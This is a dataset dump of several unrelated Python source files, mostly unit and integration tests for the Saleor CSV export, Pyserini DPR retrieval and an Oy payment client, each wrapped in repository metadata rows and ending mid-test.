| 58.666667 | 74 | 0.886364 | 35 | 352 | 8.771429 | 0.314286 | 0.19544 | 0.407166 | 0.521173 | 0.664495 | 0.547231 | 0 | 0 | 0 | 0 | 0 | 0.018072 | 0.056818 | 352 | 5 | 75 | 70.4 | 0.906627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13592e18685a1794925ce0875909b60ba520e633 | 16,707 | py | Python | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 4 | 2021-03-27T16:38:48.000Z | 2021-10-18T12:54:15.000Z | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 11 | 2021-03-30T14:26:57.000Z | 2022-03-12T00:51:07.000Z | saleor/csv/tests/export/products_data/test_handle_relations_data.py | angeles-ricardo-89/saleor | 5fab7a883d025bff83320fbdd557ed7afa2923a9 | [
"BSD-3-Clause"
] | 12 | 2019-03-21T03:24:58.000Z | 2022-01-13T10:55:34.000Z | from unittest.mock import patch
from .....graphql.csv.enums import ProductFieldEnum
from .....product.models import Attribute, Product, ProductImage, VariantImage
from .....warehouse.models import Warehouse
from ....utils.products_data import (
ProductExportFields,
add_attribute_info_to_data,
add_collection_info_to_data,
add_image_uris_to_data,
add_warehouse_info_to_data,
get_products_relations_data,
get_variants_relations_data,
prepare_products_relations_data,
prepare_variants_relations_data,
)
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data(prepare_products_data_mocked, product_list):
# given
qs = Product.objects.all()
export_fields = {
"collections__slug" "images__image",
"name",
"description",
}
attribute_ids = []
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.called_once_with(
qs, {"collections__slug", "images__image"}, attribute_ids
)
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data_no_relations_fields(
prepare_products_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = []
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.assert_not_called()
@patch("saleor.csv.utils.products_data.prepare_products_relations_data")
def test_get_products_relations_data_attribute_ids(
prepare_products_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
# when
get_products_relations_data(qs, export_fields, attribute_ids)
# then
prepare_products_data_mocked.called_once_with(qs, {}, attribute_ids)
def test_prepare_products_relations_data(product_with_image, collection_list):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = set(
ProductExportFields.HEADERS_TO_FIELDS_MAPPING["product_many_to_many"].values()
)
attribute_ids = [
str(attr.assignment.attribute.pk)
for attr in product_with_image.attributes.all()
]
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
collections = ", ".join(
sorted([collection.slug for collection in collection_list[:2]])
)
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in product_with_image.images.all()
]
)
expected_result = {pk: {"collections__slug": collections, "images__image": images}}
assigned_attribute = product_with_image.attributes.first()
if assigned_attribute:
header = f"{assigned_attribute.attribute.slug} (product attribute)"
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
def test_prepare_products_relations_data_only_fields(
product_with_image, collection_list
):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = {"collections__slug"}
attribute_ids = []
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
collections = ", ".join(
sorted([collection.slug for collection in collection_list[:2]])
)
expected_result = {pk: {"collections__slug": collections}}
assert result == expected_result
def test_prepare_products_relations_data_only_attributes_ids(
product_with_image, collection_list
):
# given
pk = product_with_image.pk
collection_list[0].products.add(product_with_image)
collection_list[1].products.add(product_with_image)
qs = Product.objects.all()
fields = {"name"}
attribute_ids = [
str(attr.assignment.attribute.pk)
for attr in product_with_image.attributes.all()
]
# when
result = prepare_products_relations_data(qs, fields, attribute_ids)
# then
expected_result = {pk: {}}
assigned_attribute = product_with_image.attributes.first()
if assigned_attribute:
header = f"{assigned_attribute.attribute.slug} (product attribute)"
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data(prepare_variants_data_mocked, product_list):
# given
qs = Product.objects.all()
export_fields = {
"collections__slug",
"variants__sku",
"variants__images__image",
}
attribute_ids = []
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(
qs, {ProductFieldEnum.VARIANT_IMAGES.value}, attribute_ids, warehouse_ids
)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_no_relations_fields(
prepare_variants_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = []
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.assert_not_called()
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_attribute_ids(
prepare_variants_data_mocked, product_list
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
warehouse_ids = []
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_warehouse_ids(
prepare_variants_data_mocked, product_list, warehouses
):
# given
qs = Product.objects.all()
export_fields = {"name", "variants__sku"}
attribute_ids = []
warehouse_ids = list(Warehouse.objects.values_list("pk", flat=True))
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
@patch("saleor.csv.utils.products_data.prepare_variants_relations_data")
def test_get_variants_relations_data_attributes_and_warehouses_ids(
prepare_variants_data_mocked, product_list, warehouses
):
# given
qs = Product.objects.all()
export_fields = {"name", "description"}
attribute_ids = list(Attribute.objects.values_list("pk", flat=True))
warehouse_ids = list(Warehouse.objects.values_list("pk", flat=True))
# when
get_variants_relations_data(qs, export_fields, attribute_ids, warehouse_ids)
# then
prepare_variants_data_mocked.called_once_with(qs, {}, attribute_ids, warehouse_ids)
def test_prepare_variants_relations_data(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = {"variants__images__image"}
attribute_ids = [str(attr.pk) for attr in Attribute.objects.all()]
warehouse_ids = [str(w.pk) for w in Warehouse.objects.all()]
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in variant.images.all()
]
)
expected_result = {pk: {"variants__images__image": images}}
for assigned_attribute in variant.attributes.all():
header = f"{assigned_attribute.attribute.slug} (variant attribute)"
if str(assigned_attribute.attribute.pk) in attribute_ids:
expected_result[pk][header] = assigned_attribute.values.first().slug
for stock in variant.stocks.all():
if str(stock.warehouse.pk) in warehouse_ids:
slug = stock.warehouse.slug
warehouse_headers = [
f"{slug} (warehouse quantity)",
]
expected_result[pk][warehouse_headers[0]] = stock.quantity
assert result == expected_result
def test_prepare_variants_relations_data_only_fields(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = {"variants__images__image"}
attribute_ids = []
warehouse_ids = []
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
images = ", ".join(
[
"http://mirumee.com/media/" + image.image.name
for image in variant.images.all()
]
)
expected_result = {pk: {"variants__images__image": images}}
assert result == expected_result
def test_prepare_variants_relations_data_attributes_ids(
product_with_variant_with_two_attributes, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_variant_with_two_attributes.variants.first()
product_image = ProductImage.objects.create(
product=product_with_variant_with_two_attributes, image=image
)
VariantImage.objects.create(variant=variant, image=product_image)
fields = set()
attribute_ids = [str(attr.pk) for attr in Attribute.objects.all()]
warehouse_ids = []
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
expected_result = {pk: {}}
for assigned_attribute in variant.attributes.all():
header = f"{assigned_attribute.attribute.slug} (variant attribute)"
if str(assigned_attribute.attribute.pk) in attribute_ids:
expected_result[pk][header] = assigned_attribute.values.first().slug
assert result == expected_result
def test_prepare_variants_relations_data_warehouse_ids(
product_with_single_variant, image, media_root
):
# given
qs = Product.objects.all()
variant = product_with_single_variant.variants.first()
fields = set()
attribute_ids = []
warehouse_ids = [str(w.pk) for w in Warehouse.objects.all()]
# when
result = prepare_variants_relations_data(qs, fields, attribute_ids, warehouse_ids)
# then
pk = variant.pk
expected_result = {pk: {}}
for stock in variant.stocks.all():
if str(stock.warehouse.pk) in warehouse_ids:
slug = stock.warehouse.slug
warehouse_headers = [
f"{slug} (warehouse quantity)",
]
expected_result[pk][warehouse_headers[0]] = stock.quantity
assert result == expected_result
def test_add_collection_info_to_data(product):
# given
pk = product.pk
collection = "test_collection"
input_data = {pk: {}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result[pk]["collections__slug"] == {collection}
def test_add_collection_info_to_data_update_collections(product):
# given
pk = product.pk
existing_collection = "test2"
collection = "test_collection"
input_data = {pk: {"collections__slug": {existing_collection}}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result[pk]["collections__slug"] == {collection, existing_collection}
def test_add_collection_info_to_data_no_collection(product):
# given
pk = product.pk
collection = None
input_data = {pk: {}}
# when
result = add_collection_info_to_data(product.pk, collection, input_data)
# then
assert result == input_data
def test_add_image_uris_to_data(product):
# given
pk = product.pk
image_path = "test/path/image.jpg"
field = "variant_images"
input_data = {pk: {}}
# when
result = add_image_uris_to_data(product.pk, image_path, field, input_data)
# then
assert result[pk][field] == {"http://mirumee.com/media/" + image_path}
def test_add_image_uris_to_data_update_images(product):
# given
pk = product.pk
old_path = "http://mirumee.com/media/test/image0.jpg"
image_path = "test/path/image.jpg"
input_data = {pk: {"product_images": {old_path}}}
field = "product_images"
# when
result = add_image_uris_to_data(product.pk, image_path, field, input_data)
# then
assert result[pk][field] == {"http://mirumee.com/media/" + image_path, old_path}
def test_add_image_uris_to_data_no_image_path(product):
# given
pk = product.pk
image_path = None
input_data = {pk: {"name": "test"}}
# when
result = add_image_uris_to_data(
product.pk, image_path, "product_images", input_data
)
# then
assert result == input_data
def test_add_attribute_info_to_data(product):
# given
pk = product.pk
slug = "test_attribute_slug"
value = "test value"
attribute_data = {
"slug": slug,
"value": value,
}
input_data = {pk: {}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "product attribute", input_data
)
# then
expected_header = f"{slug} (product attribute)"
assert result[pk][expected_header] == {value}
def test_add_attribute_info_to_data_update_attribute_data(product):
# given
pk = product.pk
slug = "test_attribute_slug"
value = "test value"
expected_header = f"{slug} (variant attribute)"
attribute_data = {
"slug": slug,
"value": value,
}
input_data = {pk: {expected_header: {"value1"}}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "variant attribute", input_data
)
# then
assert result[pk][expected_header] == {value, "value1"}
def test_add_attribute_info_to_data_no_slug(product):
# given
pk = product.pk
attribute_data = {
"slug": None,
"value": None,
}
input_data = {pk: {}}
# when
result = add_attribute_info_to_data(
product.pk, attribute_data, "variant attribute", input_data
)
# then
assert result == input_data
def test_add_warehouse_info_to_data(product):
# given
pk = product.pk
slug = "test_warehouse"
warehouse_data = {
"slug": slug,
"qty": 12,
"qty_alc": 10,
}
input_data = {pk: {}}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
expected_header = f"{slug} (warehouse quantity)"
assert result[pk][expected_header] == 12
def test_add_warehouse_info_to_data_data_not_changed(product):
# given
pk = product.pk
slug = "test_warehouse"
warehouse_data = {
"slug": slug,
"qty": 12,
"qty_alc": 10,
}
input_data = {
pk: {
f"{slug} (warehouse quantity)": 5,
f"{slug} (warehouse quantity allocated)": 8,
}
}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
assert result == input_data
def test_add_warehouse_info_to_data_data_no_slug(product):
# given
pk = product.pk
warehouse_data = {
"slug": None,
"qty": None,
"qty_alc": None,
}
input_data = {pk: {}}
# when
result = add_warehouse_info_to_data(product.pk, warehouse_data, input_data)
# then
assert result == input_data
| 28.607877 | 87 | 0.696295 | 2,025 | 16,707 | 5.37037 | 0.057778 | 0.050207 | 0.048276 | 0.039724 | 0.898023 | 0.871356 | 0.834391 | 0.814069 | 0.787402 | 0.78069 | 0 | 0.00195 | 0.202071 | 16,707 | 583 | 88 | 28.656947 | 0.813817 | 0.025798 | 0 | 0.656 | 0 | 0 | 0.117821 | 0.046375 | 0 | 0 | 0 | 0 | 0.056 | 1 | 0.072 | false | 0 | 0.013333 | 0 | 0.085333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
136b2acd5b7f4020562c6c22bbac026b4745a54b | 14,542 | py | Python | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | #
# Pyserini: Python interface to the Anserini IR toolkit built on Lucene
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Integration tests for DPR model using pre-encoded queries."""
import os
import socket
import unittest
from integrations.utils import clean_files, run_command, parse_score
class TestSearchIntegration(unittest.TestCase):
def setUp(self):
self.temp_files = []
self.threads = 12
self.batch_size = 36
# Hard-code larger values for internal servers
if socket.gethostname().startswith('damiano') or socket.gethostname().startswith('orca'):
self.threads = 36
self.batch_size = 144
def test_dpr_nq_test_bf(self):
output_file = 'test_run.dpr.nq-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.nq-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-nq-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-nq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7947, places=4)
def test_dpr_nq_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.nq-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.nq-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 1.3 \
run --topics dpr-nq-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-nq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8260, places=4)
def test_dpr_trivia_test_bf(self):
output_file = 'test_run.dpr.trivia-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.trivia-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-trivia-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-trivia-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7887, places=4)
def test_dpr_trivia_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.trivia-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.trivia-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 0.95 \
run --topics dpr-trivia-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-trivia-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8264, places=4)
def test_dpr_wq_test_bf(self):
output_file = 'test_run.dpr.wq-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.wq-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-wq-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-wq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7505, places=4)
def test_dpr_wq_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.wq-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.wq-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 0.95 \
run --topics dpr-wq-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-wq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7712, places=4)
def test_dpr_curated_test_bf(self):
output_file = 'test_run.dpr.curated-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.curated-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-curated-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-curated-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20 --regex'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8876, places=4)
def test_dpr_curated_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.curated-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.curated-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 1.05 \
run --topics dpr-curated-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-curated-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20 --regex'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.9006, places=4)
def test_dpr_squad_test_bf(self):
output_file = 'test_run.dpr.squad-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.squad-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-squad-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-squad-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.5199, places=4)
def test_dpr_squad_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.squad-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.squad-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 2.0 \
run --topics dpr-squad-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-squad-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7511, places=4)
def tearDown(self):
clean_files(self.temp_files)
if __name__ == '__main__':
unittest.main()
| 55.503817 | 111 | 0.545592 | 1,588 | 14,542 | 4.816121 | 0.110202 | 0.052301 | 0.031381 | 0.062762 | 0.874869 | 0.86637 | 0.863232 | 0.860356 | 0.833421 | 0.833421 | 0 | 0.029421 | 0.354903 | 14,542 | 261 | 112 | 55.716475 | 0.785844 | 0.047586 | 0 | 0.69469 | 0 | 0 | 0.12387 | 0.082291 | 0 | 0 | 0 | 0 | 0.132743 | 1 | 0.053097 | false | 0 | 0.017699 | 0 | 0.075221 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13855dfc9d136ef375e7087c6e377e09413bd7c6 | 155 | py | Python | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | 8 | 2021-04-13T01:52:11.000Z | 2022-03-30T03:53:12.000Z | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | 4 | 2021-05-29T01:41:00.000Z | 2021-08-24T09:40:43.000Z | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | null | null | null | from .enas_policy import EnasSearchPolicy
from .darts_policy import DartsSearchPolicy
from .nao_policy import NaoSearchPolicy
from .random_policy import *
| 31 | 43 | 0.864516 | 19 | 155 | 6.842105 | 0.526316 | 0.369231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 155 | 4 | 44 | 38.75 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1395193b4b821d6266d67d5fce82a4a76ef90350 | 14,889 | py | Python | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 2 | 2020-03-23T00:34:15.000Z | 2020-04-08T10:15:03.000Z | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 1 | 2020-03-28T04:09:51.000Z | 2020-03-28T04:09:51.000Z | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 1 | 2020-05-26T02:03:00.000Z | 2020-05-26T02:03:00.000Z | from unittest.mock import Mock, patch
from decimal import Decimal
import pytest
from oy.provider import OyProvider
from oy.core.exceptions import FetchError, StatusCodeError
from oy.exceptions import ProviderError
@patch("oy.core.remote_call.RemoteCall")
def test_inquiry_account_success(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"status": {"code": "000", "message": "Success"},
"recipient_bank": "014",
"recipient_account": "1239812390",
"recipient_name": "John Doe",
"timestamp": "16-10-2019 09:55:31",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.inquiry_account("014", "1239812390")
assert response["recipient_bank"]
assert response["recipient_account"]
assert response["recipient_name"]
assert response["timestamp"]
@patch("oy.core.remote_call.RemoteCall")
def test_disburse(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"status": {"code": "101", "message": "Request is Processed"},
"amount": 125000,
"recipient_bank": "014",
"recipient_account": "1239812390",
"trx_id": "ABC-456",
"partner_trx_id": "1234-asdf",
"timestamp": "16-10-2019 10:23:42",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.disburse("014", "1239812390", 125000)
assert response["trx_id"]
assert response["partner_trx_id"]
assert response["recipient_bank"]
assert response["recipient_account"]
assert response["amount"]
# make sure amount is decimal
